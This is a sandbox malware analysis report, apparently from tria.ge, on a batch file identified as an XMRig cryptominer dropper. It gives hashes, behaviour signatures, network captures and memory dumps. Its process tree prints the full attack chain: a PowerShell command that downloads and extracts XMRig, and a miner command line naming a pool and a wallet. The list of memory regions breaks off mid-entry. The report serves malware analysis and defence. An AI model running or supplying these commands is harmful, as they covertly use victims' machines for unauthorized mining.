Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

1

tesy - Copy (10).bat

windows10-1703-x64

10

tesy - Copy (11).bat

windows10-1703-x64

10

tesy - Copy (12).bat

windows10-1703-x64

10

tesy - Copy (13).bat

windows10-1703-x64

10

tesy - Copy (14).bat

windows10-1703-x64

10

tesy - Copy (2).bat

windows10-1703-x64

10

tesy - Copy (3).bat

windows10-1703-x64

10

tesy - Copy (4).bat

windows10-1703-x64

10

tesy - Copy (5).bat

windows10-1703-x64

10

tesy - Copy (6).bat

windows10-1703-x64

10

tesy - Copy (7).bat

windows10-1703-x64

10

tesy - Copy (8).bat

windows10-1703-x64

10

tesy - Copy (9).bat

windows10-1703-x64

10

tesy - Copy.bat

windows10-1703-x64

10

tesy.bat

windows10-1703-x64

10

Analysis

  • max time kernel
    1794s
  • max time network
    1806s
  • platform
    windows10-1703_x64
  • resource
    win10-20231215-en
  • resource tags

    arch:x64arch:x86image:win10-20231215-enlocale:en-usos:windows10-1703-x64system
  • submitted
    30/12/2023, 07:23 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    tesy - Copy.bat

  • Size

    608B

  • MD5

    727c8da0478af118c957ae60f7161cab

  • SHA1

    cf18105b8659e93bbd2824fa35ef1bae7b395301

  • SHA256

    97db0437ecb6f401a4674dceead7b17a885241f2ab2495652863d2240f3bedab

  • SHA512

    d9cbb46d5f3caa92d3b44301bc96ccfd5552f2ab3e5460362db3b59d23e0a5c34bf78e9387009092ac5c92b4423c03789aa1fc824a4e1388a1363daa6ab54e01

Score
10/10
xmrigminer

Malware Config

Extracted

Language
ps1
Deobfuscated
1
(new-object system.net.webclient).downloadfile("https://github.com/xmrig/xmrig/releases/download/v6.21.0/xmrig-6.21.0-gcc-win64.zip", "xmrig-6.21.0-gcc-win64.zip")
2
URLs
exe.dropper

https://github.com/xmrig/xmrig/releases/download/v6.21.0/xmrig-6.21.0-gcc-win64.zip

Signatures

  • XMRig Miner payload 64 IoCs
    miner
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

    minerxmrig
  • Blocklisted process makes network request 2 IoCs
  • Executes dropped EXE 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\tesy - Copy.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:8
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -command "(New-Object System.Net.WebClient).DownloadFile('https://github.com/xmrig/xmrig/releases/download/v6.21.0/xmrig-6.21.0-gcc-win64.zip', 'xmrig-6.21.0-gcc-win64.zip')"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:5044
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -command "Expand-Archive -Path 'xmrig-6.21.0-gcc-win64.zip' -DestinationPath '.'"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1844
    • C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
      xmrig.exe --url pool.hashvault.pro:80 --user 42BWpXvTvDbHpMyHrnjqBA5bqjnB9z65fGakJV9dQuHSS7pRkpoyx5T4vE4pUjJxPoPrLCAerjoKwdMTQKZNNEqo6zoLmPJ --pass tria2 --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      PID:5088

Network

  • flag-us
    DNS
    github.com
    powershell.exe
    Remote address:
    8.8.8.8:53
    Request
    github.com
    IN A
    Response
    github.com
    IN A
    140.82.121.4
  • flag-de
    GET
    https://github.com/xmrig/xmrig/releases/download/v6.21.0/xmrig-6.21.0-gcc-win64.zip
    powershell.exe
    Remote address:
    140.82.121.4:443
    Request
    GET /xmrig/xmrig/releases/download/v6.21.0/xmrig-6.21.0-gcc-win64.zip HTTP/1.1
    Host: github.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 302 Found
    Server: GitHub.com
    Date: Sat, 30 Dec 2023 07:24:57 GMT
    Content-Type: text/html; charset=utf-8
    Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
    Location: https://objects.githubusercontent.com/github-production-release-asset-2e65be/88327406/73696a88-ab95-4bee-8f68-b88d69b97716?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAVCODYLSA53PQK4ZA%2F20231230%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20231230T072457Z&X-Amz-Expires=300&X-Amz-Signature=4df592d4dca2bad8f19a3b7f81649e1c251df8e75aaad33b4ef61e50e5d19e77&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=88327406&response-content-disposition=attachment%3B%20filename%3Dxmrig-6.21.0-gcc-win64.zip&response-content-type=application%2Foctet-stream
    Cache-Control: no-cache
    Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
    X-Frame-Options: deny
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 0
    Referrer-Policy: no-referrer-when-downgrade
    Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com cdn.optimizely.com logx.optimizely.com/v1/events api.githubcopilot.com objects-origin.githubusercontent.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com support.github.com; img-src 'self' data: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/
    Content-Length: 0
    X-GitHub-Request-Id: C286:208389:E61212D:E98B35F:658FC5CB
  • flag-us
    DNS
    objects.githubusercontent.com
    powershell.exe
    Remote address:
    8.8.8.8:53
    Request
    objects.githubusercontent.com
    IN A
    Response
    objects.githubusercontent.com
    IN A
    185.199.108.133
    objects.githubusercontent.com
    IN A
    185.199.109.133
    objects.githubusercontent.com
    IN A
    185.199.110.133
    objects.githubusercontent.com
    IN A
    185.199.111.133
  • flag-us
    GET
    https://objects.githubusercontent.com/github-production-release-asset-2e65be/88327406/73696a88-ab95-4bee-8f68-b88d69b97716?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAVCODYLSA53PQK4ZA%2F20231230%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20231230T072457Z&X-Amz-Expires=300&X-Amz-Signature=4df592d4dca2bad8f19a3b7f81649e1c251df8e75aaad33b4ef61e50e5d19e77&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=88327406&response-content-disposition=attachment%3B%20filename%3Dxmrig-6.21.0-gcc-win64.zip&response-content-type=application%2Foctet-stream
    powershell.exe
    Remote address:
    185.199.108.133:443
    Request
    GET /github-production-release-asset-2e65be/88327406/73696a88-ab95-4bee-8f68-b88d69b97716?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAVCODYLSA53PQK4ZA%2F20231230%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20231230T072457Z&X-Amz-Expires=300&X-Amz-Signature=4df592d4dca2bad8f19a3b7f81649e1c251df8e75aaad33b4ef61e50e5d19e77&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=88327406&response-content-disposition=attachment%3B%20filename%3Dxmrig-6.21.0-gcc-win64.zip&response-content-type=application%2Foctet-stream HTTP/1.1
    Host: objects.githubusercontent.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Connection: keep-alive
    Content-Length: 3334626
    Content-Type: application/octet-stream
    Content-MD5: SyJ16N9lcZAJMUoKI6RVWA==
    Last-Modified: Thu, 23 Nov 2023 14:15:49 GMT
    ETag: "0x8DBEC2EB1771407"
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: 72337178-c01e-0025-4b17-1e4829000000
    x-ms-version: 2020-04-08
    x-ms-creation-time: Thu, 23 Nov 2023 14:15:49 GMT
    x-ms-lease-status: unlocked
    x-ms-lease-state: available
    x-ms-blob-type: BlockBlob
    Content-Disposition: attachment; filename=xmrig-6.21.0-gcc-win64.zip
    x-ms-server-encrypted: true
    Via: 1.1 varnish, 1.1 varnish
    Accept-Ranges: bytes
    Date: Sat, 30 Dec 2023 07:24:59 GMT
    Age: 3326
    X-Served-By: cache-iad-kiad7000110-IAD, cache-lcy-eglc8600035-LCY
    X-Cache: HIT, HIT
    X-Cache-Hits: 10174, 1
    X-Timer: S1703921099.496240,VS0,VE323
  • flag-us
    DNS
    4.121.82.140.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    4.121.82.140.in-addr.arpa
    IN PTR
    Response
    4.121.82.140.in-addr.arpa
    IN PTR
    lb-140-82-121-4-fragithubcom
  • flag-us
    DNS
    133.108.199.185.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    133.108.199.185.in-addr.arpa
    IN PTR
    Response
    133.108.199.185.in-addr.arpa
    IN PTR
    cdn-185-199-108-133githubcom
  • flag-us
    DNS
    79.121.231.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    79.121.231.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    pool.hashvault.pro
    xmrig.exe
    Remote address:
    8.8.8.8:53
    Request
    pool.hashvault.pro
    IN A
    Response
    pool.hashvault.pro
    IN A
    95.179.241.203
    pool.hashvault.pro
    IN A
    45.76.89.70
  • flag-us
    DNS
    203.241.179.95.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    203.241.179.95.in-addr.arpa
    IN PTR
    Response
    203.241.179.95.in-addr.arpa
    IN PTR
    95179241203vultrusercontentcom
  • flag-us
    DNS
    114.110.16.96.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    114.110.16.96.in-addr.arpa
    IN PTR
    Response
    114.110.16.96.in-addr.arpa
    IN PTR
    a96-16-110-114deploystaticakamaitechnologiescom
  • flag-us
    DNS
    114.110.16.96.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    114.110.16.96.in-addr.arpa
    IN PTR
  • flag-us
    DNS
    19.229.111.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    19.229.111.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    19.229.111.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    19.229.111.52.in-addr.arpa
    IN PTR
  • flag-us
    DNS
    19.229.111.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    19.229.111.52.in-addr.arpa
    IN PTR
  • flag-us
    DNS
    89.16.208.104.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    89.16.208.104.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    194.178.17.96.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    194.178.17.96.in-addr.arpa
    IN PTR
    Response
    194.178.17.96.in-addr.arpa
    IN PTR
    a96-17-178-194deploystaticakamaitechnologiescom
  • flag-us
    DNS
    180.178.17.96.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    180.178.17.96.in-addr.arpa
    IN PTR
    Response
    180.178.17.96.in-addr.arpa
    IN PTR
    a96-17-178-180deploystaticakamaitechnologiescom
  • flag-us
    DNS
    180.178.17.96.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    180.178.17.96.in-addr.arpa
    IN PTR
  • flag-us
    DNS
    180.178.17.96.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    180.178.17.96.in-addr.arpa
    IN PTR
  • 140.82.121.4:443
    https://github.com/xmrig/xmrig/releases/download/v6.21.0/xmrig-6.21.0-gcc-win64.zip
    tls, http
    powershell.exe
    814 B
     6.6kB
     9
    7

    HTTP Request

    GET https://github.com/xmrig/xmrig/releases/download/v6.21.0/xmrig-6.21.0-gcc-win64.zip

    HTTP Response

    302
  • 185.199.108.133:443
    https://objects.githubusercontent.com/github-production-release-asset-2e65be/88327406/73696a88-ab95-4bee-8f68-b88d69b97716?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAVCODYLSA53PQK4ZA%2F20231230%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20231230T072457Z&X-Amz-Expires=300&X-Amz-Signature=4df592d4dca2bad8f19a3b7f81649e1c251df8e75aaad33b4ef61e50e5d19e77&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=88327406&response-content-disposition=attachment%3B%20filename%3Dxmrig-6.21.0-gcc-win64.zip&response-content-type=application%2Foctet-stream
    tls, http
    powershell.exe
    69.1kB
     3.3MB
     1424
    2372

    HTTP Request

    GET https://objects.githubusercontent.com/github-production-release-asset-2e65be/88327406/73696a88-ab95-4bee-8f68-b88d69b97716?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAVCODYLSA53PQK4ZA%2F20231230%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20231230T072457Z&X-Amz-Expires=300&X-Amz-Signature=4df592d4dca2bad8f19a3b7f81649e1c251df8e75aaad33b4ef61e50e5d19e77&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=88327406&response-content-disposition=attachment%3B%20filename%3Dxmrig-6.21.0-gcc-win64.zip&response-content-type=application%2Foctet-stream

    HTTP Response

    200
  • 95.179.241.203:80
    pool.hashvault.pro
    tls
    xmrig.exe
    29.8kB
     67.8kB
     231
    186
  • 8.8.8.8:53
    github.com
    dns
    powershell.exe
    56 B
     72 B
     1
    1

    DNS Request

    github.com

    DNS Response

    140.82.121.4

  • 8.8.8.8:53
    objects.githubusercontent.com
    dns
    powershell.exe
    75 B
     139 B
     1
    1

    DNS Request

    objects.githubusercontent.com

    DNS Response

    185.199.108.133
    185.199.109.133
    185.199.110.133
    185.199.111.133

  • 8.8.8.8:53
    4.121.82.140.in-addr.arpa
    dns
    71 B
     115 B
     1
    1

    DNS Request

    4.121.82.140.in-addr.arpa

  • 8.8.8.8:53
    133.108.199.185.in-addr.arpa
    dns
    74 B
     118 B
     1
    1

    DNS Request

    133.108.199.185.in-addr.arpa

  • 8.8.8.8:53
    79.121.231.20.in-addr.arpa
    dns
    72 B
     158 B
     1
    1

    DNS Request

    79.121.231.20.in-addr.arpa

  • 8.8.8.8:53
    pool.hashvault.pro
    dns
    xmrig.exe
    64 B
     96 B
     1
    1

    DNS Request

    pool.hashvault.pro

    DNS Response

    95.179.241.203
    45.76.89.70

  • 8.8.8.8:53
    203.241.179.95.in-addr.arpa
    dns
    73 B
     122 B
     1
    1

    DNS Request

    203.241.179.95.in-addr.arpa

  • 8.8.8.8:53
    114.110.16.96.in-addr.arpa
    dns
    144 B
     137 B
     2
    1

    DNS Request

    114.110.16.96.in-addr.arpa

    DNS Request

    114.110.16.96.in-addr.arpa

  • 8.8.8.8:53
    19.229.111.52.in-addr.arpa
    dns
    216 B
     158 B
     3
    1

    DNS Request

    19.229.111.52.in-addr.arpa

    DNS Request

    19.229.111.52.in-addr.arpa

    DNS Request

    19.229.111.52.in-addr.arpa

  • 8.8.8.8:53
    89.16.208.104.in-addr.arpa
    dns
    72 B
     146 B
     1
    1

    DNS Request

    89.16.208.104.in-addr.arpa

  • 8.8.8.8:53
    194.178.17.96.in-addr.arpa
    dns
    72 B
     137 B
     1
    1

    DNS Request

    194.178.17.96.in-addr.arpa

  • 8.8.8.8:53
    180.178.17.96.in-addr.arpa
    dns
    216 B
     137 B
     3
    1

    DNS Request

    180.178.17.96.in-addr.arpa

    DNS Request

    180.178.17.96.in-addr.arpa

    DNS Request

    180.178.17.96.in-addr.arpa

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
    Filesize

    3KB

    MD5

    56efdb5a0f10b5eece165de4f8c9d799

    SHA1

    fa5de7ca343b018c3bfeab692545eb544c244e16

    SHA256

    6c4e3fefc4faa1876a72c0964373c5fa08d3ab074eec7b1313b3e8410b9cb108

    SHA512

    91e50779bbae7013c492ea48211d6b181175bfed38bf4b451925d5812e887c555528502316bbd4c4ab1f21693d77b700c44786429f88f60f7d92f21e46ea5ddc

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    1KB

    MD5

    ef32294976d9291d732045f2c7b75bd9

    SHA1

    8d3a27350a4e625f8456b5f1a02e73904165557e

    SHA256

    759e256b19951b0035e2baa428715ff699e7ae35f7671b929ac02b24ca553219

    SHA512

    fa31da6c840290f04634f2e558885a913c78672a4eebc5f8fb08c7269f79f1af586557ee68ede23f37a31a34e507ec7b4307d6cf53fadc7e80d95865063e1e03

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_s24lauc3.z45.ps1
    Filesize

    1B

    MD5

    c4ca4238a0b923820dcc509a6f75849b

    SHA1

    356a192b7913b04c54574d18c28d46e6395428ab

    SHA256

    6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

    SHA512

    4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0-gcc-win64.zip
    Filesize

    30KB

    MD5

    e0fd4e23e9c6101b3e26c14a9579b389

    SHA1

    cb0da5f01413e3f6ec3ddb707a2cba3ff5a03e4e

    SHA256

    a6e6773a1dcb9788d9838c2be3fda5fbd422d7931b73c2997598b61dc013aeac

    SHA512

    bc8b1af3472ad5f99b440f61853300ca501341cfef5e6d6c0156331ae0c3be0e788d7663569c1edbd94e083e77c9cf3ca35d28ff339b00805ac6bc373cc618cf

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
    Filesize

    78KB

    MD5

    05687030d6c1ff777ef5f200c6cb3e9d

    SHA1

    3ab330585182bb084509873bb8594e7aae48124a

    SHA256

    b404c3f533cf252f51749190bcf028ee93536a7edb49565debe478fd223907e9

    SHA512

    27b8760dc3b2f109e92f8a675dfd28f5cd0d7463fea741e874040ccb30d588a5cbb46b075a6301187e3f714d714a01b3b637206b94bccc9874c15439c9828325

    Download Submit

  • memory/1844-41-0x0000020A6E560000-0x0000020A6E570000-memory.dmp

    Filesize

    64KB

    Download

  • memory/1844-39-0x00007FF823750000-0x00007FF82413C000-memory.dmp

    Filesize

    9.9MB

    Download

  • memory/1844-117-0x00007FF823750000-0x00007FF82413C000-memory.dmp

    Filesize

    9.9MB

    Download

  • memory/1844-80-0x0000020A6EA40000-0x0000020A6EA52000-memory.dmp

    Filesize

    72KB

    Download

  • memory/1844-93-0x0000020A6E850000-0x0000020A6E85A000-memory.dmp

    Filesize

    40KB

    Download

  • memory/1844-66-0x0000020A6E560000-0x0000020A6E570000-memory.dmp

    Filesize

    64KB

    Download

  • memory/1844-42-0x0000020A6E560000-0x0000020A6E570000-memory.dmp

    Filesize

    64KB

    Download

  • memory/5044-29-0x000002BDB85C0000-0x000002BDB85D0000-memory.dmp

    Filesize

    64KB

    Download

  • memory/5044-6-0x00007FF823750000-0x00007FF82413C000-memory.dmp

    Filesize

    9.9MB

    Download

  • memory/5044-34-0x00007FF823750000-0x00007FF82413C000-memory.dmp

    Filesize

    9.9MB

    Download

  • memory/5044-10-0x000002BDB8650000-0x000002BDB86C6000-memory.dmp

    Filesize

    472KB

    Download

  • memory/5044-8-0x000002BDB85C0000-0x000002BDB85D0000-memory.dmp

    Filesize

    64KB

    Download

  • memory/5044-25-0x000002BDB85C0000-0x000002BDB85D0000-memory.dmp

    Filesize

    64KB

    Download

  • memory/5044-9-0x000002BDB85C0000-0x000002BDB85D0000-memory.dmp

    Filesize

    64KB

    Download

  • memory/5044-28-0x000002BDB85C0000-0x000002BDB85D0000-memory.dmp

    Filesize

    64KB

    Download

  • memory/5044-27-0x000002BDB85C0000-0x000002BDB85D0000-memory.dmp

    Filesize

    64KB

    Download

  • memory/5044-26-0x00007FF823750000-0x00007FF82413C000-memory.dmp

    Filesize

    9.9MB

    Download

  • memory/5044-4-0x000002BDB8430000-0x000002BDB8452000-memory.dmp

    Filesize

    136KB

    Download

  • memory/5088-143-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp

    Filesize

    11.0MB

    Download

  • memory/5088-155-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp

    Filesize

    11.0MB

    Download

  • memory/5088-122-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp

    Filesize

    11.0MB

    Download

  • memory/5088-123-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp

    Filesize

    11.0MB

    Download

  • memory/5088-125-0x00000183C61F0000-0x00000183C6210000-memory.dmp

    Filesize

    128KB

    Download

  • memory/5088-124-0x00000183C5FC0000-0x00000183C5FE0000-memory.dmp

    Filesize

    128KB

    Download

  • memory/5088-126-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp

    Filesize

    11.0MB

    Download

  • memory/5088-127-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp

    Filesize

    11.0MB

    Download

  • memory/5088-129-0x00000183C61F0000-0x00000183C6210000-memory.dmp

    Filesize

    128KB

    Download

  • memory/5088-128-0x00000183C5FC0000-0x00000183C5FE0000-memory.dmp

    Filesize

    128KB

    Download

  • memory/5088-130-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp

    Filesize

    11.0MB

    Download

  • memory/5088-131-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp

    Filesize

    11.0MB

    Download

  • memory/5088-132-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp

    Filesize

    11.0MB

    Download

  • memory/5088-133-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp

    Filesize

    11.0MB

    Download

  • memory/5088-134-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp

    Filesize

    11.0MB

    Download

  • memory/5088-135-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp

    Filesize

    11.0MB

    Download

  • memory/5088-136-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp

    Filesize

    11.0MB

    Download

  • memory/5088-137-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp

    Filesize

    11.0MB

    Download

  • memory/5088-138-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp

    Filesize

    11.0MB

    Download

  • memory/5088-139-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp

    Filesize

    11.0MB

    Download

  • memory/5088-140-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp

    Filesize

    11.0MB

    Download

  • memory/5088-141-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp

    Filesize

    11.0MB

    Download

  • memory/5088-142-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp

    Filesize

    11.0MB

    Download

  • memory/5088-120-0x0000018331FF0000-0x0000018332010000-memory.dmp

    Filesize

    128KB

    Download

  • memory/5088-144-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp

    Filesize

    11.0MB

    Download

  • memory/5088-145-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp

    Filesize

    11.0MB

    Download

  • memory/5088-146-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp

    Filesize

    11.0MB

    Download

  • memory/5088-147-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp

    Filesize

    11.0MB

    Download

  • memory/5088-148-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp

    Filesize

    11.0MB

    Download

  • memory/5088-149-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp

    Filesize

    11.0MB

    Download

  • memory/5088-150-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp

    Filesize

    11.0MB

    Download

  • memory/5088-151-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp

    Filesize

    11.0MB

    Download

  • memory/5088-152-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp

    Filesize

    11.0MB

    Download

  • memory/5088-153-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp

    Filesize

    11.0MB

    Download

  • memory/5088-154-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp

    Filesize

    11.0MB

    Download

  • memory/5088-121-0x00000183C5B60000-0x00000183C5BA0000-memory.dmp

    Filesize

    256KB

    Download

  • memory/5088-156-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp

    Filesize

    11.0MB

    Download

  • memory/5088-157-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp

    Filesize

    11.0MB

    Download

  • memory/5088-158-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp

    Filesize

    11.0MB

    Download

  • memory/5088-159-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp

    Filesize

    11.0MB

    Download

  • memory/5088-160-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp

    Filesize

    11.0MB

    Download

  • memory/5088-161-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp

    Filesize

    11.0MB

    Download

  • memory/5088-162-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp

    Filesize

    11.0MB

    Download

  • memory/5088-163-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp

    Filesize

    11.0MB

    Download

  • memory/5088-164-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp

    Filesize

    11.0MB

    Download

  • memory/5088-165-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp

    Filesize

    11.0MB

    Download

  • memory/5088-166-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp

    Filesize

    11.0MB

    Download

  • memory/5088-167-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp

    Filesize

    11.0MB

    Download

  • memory/5088-168-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp

    Filesize

    11.0MB

    Download

  • memory/5088-169-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp

    Filesize

    11.0MB

    Download

  • memory/5088-170-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp

    Filesize

    11.0MB

    Download

  • memory/5088-171-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp

    Filesize

    11.0MB

    Download

  • memory/5088-172-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp

    Filesize

    11.0MB

    Download

  • memory/5088-173-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp

    Filesize

    11.0MB

    Download

  • memory/5088-174-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp

    Filesize

    11.0MB

    Download

  • memory/5088-175-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp

    Filesize

    11.0MB

    Download

  • memory/5088-176-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp

    Filesize

    11.0MB

    Download

  • memory/5088-177-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp

    Filesize

    11.0MB

    Download

  • memory/5088-178-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp

    Filesize

    11.0MB

    Download

  • memory/5088-179-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp

    Filesize

    11.0MB

    Download

  • memory/5088-180-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp

